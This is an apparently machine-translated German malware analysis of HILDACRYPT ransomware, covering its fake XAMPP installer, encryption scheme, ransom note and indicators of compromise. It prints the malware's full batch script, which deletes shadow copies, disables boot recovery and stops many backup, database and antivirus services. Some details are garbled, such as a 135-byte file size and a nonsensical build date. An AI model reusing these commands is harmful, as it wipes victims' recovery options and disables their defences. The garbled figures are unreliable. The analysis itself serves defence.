Hallo, Habr! Wir sprechen wieder einmal über die neuesten Versionen von Malware aus der Kategorie Ransomware. HILDACRYPT ist eine neue Ransomware, ein Mitglied der Hilda-Familie, die im August 2019 entdeckt wurde und nach dem Netflix-Cartoon benannt ist, der zur Verbreitung der Software verwendet wurde. Heute machen wir uns mit den technischen Merkmalen dieses aktualisierten Ransomware-Virus vertraut.
In der ersten Version der Hilda-Ransomware wurde ein Link zu einer auf YouTube geposteten Version angezeigt Im Lösegeldbrief war eine Zeichentrickserie enthalten. HILDACRYPT gibt sich als legitimes XAMPP-Installationsprogramm aus, einer einfach zu installierenden Apache-Distribution, die MariaDB, PHP und Perl enthält. Gleichzeitig hat der Cryptolocker einen anderen Dateinamen – xamp. Darüber hinaus verfügt die Ransomware-Datei über keine elektronische Signatur.
Statische Analyse
Die Ransomware ist in einer für MS Windows geschriebenen PE32 .NET-Datei enthalten. Seine Größe beträgt 135 Byte. Sowohl der Hauptprogrammcode als auch der Defender-Programmcode sind in C# geschrieben. Laut Kompilierungsdatum und -zeitstempel wurde die Binärdatei am 168. September 14 erstellt.
Laut Detect It Easy wird die Ransomware mithilfe von Confuser und ConfuserEx archiviert, diese Verschleierer sind jedoch dieselben wie zuvor, nur dass ConfuserEx der Nachfolger von Confuser ist, sodass ihre Codesignaturen ähnlich sind.
HILDACRYPT ist tatsächlich mit ConfuserEx verpackt.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Angriffsvektor
Höchstwahrscheinlich wurde die Ransomware auf einer der Web-Programmierseiten entdeckt und gab sich als legitimes XAMPP-Programm aus.
Die gesamte Infektionskette ist erkennbar .
Verschleierung
Die Ransomware-Strings werden in verschlüsselter Form gespeichert. Beim Start entschlüsselt HILDACRYPT sie mithilfe von Base64 und AES-256-CBC.
Einstellung
Zunächst erstellt die Ransomware einen Ordner in %AppDataRoaming%, in dem der Parameter GUID (Globally Unique Identifier) zufällig generiert wird. Durch das Hinzufügen einer Bat-Datei an diesem Speicherort startet der Ransomware-Virus sie mithilfe von cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & beenden
Anschließend wird mit der Ausführung eines Batch-Skripts begonnen, um Systemfunktionen oder -dienste zu deaktivieren.
Das Skript enthält eine lange Liste von Befehlen, die Schattenkopien zerstören, den SQL-Server sowie Backup- und Antivirenlösungen deaktivieren.
Es versucht beispielsweise erfolglos, die Acronis Backup-Dienste zu stoppen. Darüber hinaus greift es Backup-Systeme und Antivirenlösungen der folgenden Anbieter an: Veeam, Sophos, Kaspersky, McAfee und andere.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Sobald die oben genannten Dienste und Prozesse deaktiviert sind, sammelt der Cryptolocker mithilfe des Tasklist-Befehls Informationen über alle laufenden Prozesse, um sicherzustellen, dass alle erforderlichen Dienste ausgefallen sind.
Aufgabenliste v/fo csv
Dieser Befehl zeigt eine detaillierte Liste der laufenden Prozesse an, deren Elemente durch das Zeichen „“ getrennt sind.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Nach dieser Prüfung beginnt die Ransomware mit dem Verschlüsselungsprozess.
Шифрование
Dateiverschlüsselung
HILDACRYPT durchsucht alle gefundenen Inhalte von Festplatten, mit Ausnahme der Ordner „Recycle.Bin“ und „Reference AssembliesMicrosoft“. Letzteres enthält wichtige DLL-, PDF- usw. Dateien für .NET-Anwendungen, die den Betrieb der Ransomware beeinträchtigen können. Um nach Dateien zu suchen, die verschlüsselt werden sollen, wird die folgende Liste von Erweiterungen verwendet:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Die Ransomware verwendet den AES-256-CBC-Algorithmus, um Benutzerdateien zu verschlüsseln. Die Schlüsselgröße beträgt 256 Bit und die Größe des Initialisierungsvektors (IV) beträgt 16 Byte.
Im folgenden Screenshot wurden die Werte von Byte_2 und Byte_1 mithilfe von GetBytes() zufällig ermittelt.
Schlüssel
IN UND
Die verschlüsselte Datei hat die Erweiterung HCY!. Dies ist ein Beispiel für eine verschlüsselte Datei. Der oben erwähnte Schlüssel und IV wurden für diese Datei erstellt.
Schlüsselverschlüsselung
Der Cryptolocker speichert den generierten AES-Schlüssel in einer verschlüsselten Datei. Der erste Teil der verschlüsselten Datei hat einen Header, der Daten wie HILDACRYPT, KEY, IV, FileLen im XML-Format enthält und wie folgt aussieht:
Die AES- und IV-Schlüsselverschlüsselung erfolgt mit RSA-2048 und die Kodierung erfolgt mit Base64. Der öffentliche RSA-Schlüssel wird im Hauptteil des Kryptolockers in einer der verschlüsselten Zeichenfolgen im XML-Format gespeichert.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Zur Verschlüsselung des AES-Dateischlüssels wird ein öffentlicher RSA-Schlüssel verwendet. Der öffentliche RSA-Schlüssel ist Base64-kodiert und besteht aus einem Modul und einem öffentlichen Exponenten von 65537. Für die Entschlüsselung ist der private RSA-Schlüssel erforderlich, über den der Angreifer verfügt.
Nach der RSA-Verschlüsselung wird der AES-Schlüssel mithilfe von Base64 codiert und in der verschlüsselten Datei gespeichert.
Lösegeldnachricht
Sobald die Verschlüsselung abgeschlossen ist, schreibt HILDACRYPT die HTML-Datei in den Ordner, in dem die Dateien verschlüsselt wurden. Die Ransomware-Benachrichtigung enthält zwei E-Mail-Adressen, über die das Opfer den Angreifer kontaktieren kann.
Die Erpressungsmitteilung enthält auch die Zeile „No loli issafe;)“ – eine Anspielung auf Anime- und Manga-Charaktere mit dem Aussehen kleiner Mädchen, die in Japan verboten sind.
Abschluss
HILDACRYPT, eine neue Ransomware-Familie, hat eine neue Version veröffentlicht. Das Verschlüsselungsmodell verhindert, dass das Opfer von der Ransomware verschlüsselte Dateien entschlüsselt. Cryptolocker verwendet aktive Schutzmethoden, um Schutzdienste im Zusammenhang mit Backup-Systemen und Antivirenlösungen zu deaktivieren. Der Autor von HILDACRYPT ist ein Fan der auf Netflix gezeigten Zeichentrickserie Hilda, deren Link zum Trailer im Kaufbrief für die Vorgängerversion der Sendung enthalten war.
Wie gewöhnlich, и kann Ihren Computer vor HILDACRYPT-Ransomware schützen, und Anbieter haben die Möglichkeit, ihre Kunden damit zu schützen . Der Schutz wird dadurch gewährleistet, dass diese Lösungen Folgendes umfassen beinhaltet nicht nur Backup, sondern auch unser integriertes Sicherheitssystem - Angetrieben durch ein maschinelles Lernmodell und basierend auf Verhaltensheuristiken, einer Technologie, die wie keine andere in der Lage ist, der Bedrohung durch Zero-Day-Ransomware entgegenzuwirken.
Indikatoren für Kompromisse
Dateierweiterung HCY!
HILDACRYPTReadMe.html
xamp.exe mit einem Buchstaben „p“ und ohne digitale Signatur
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: habr.com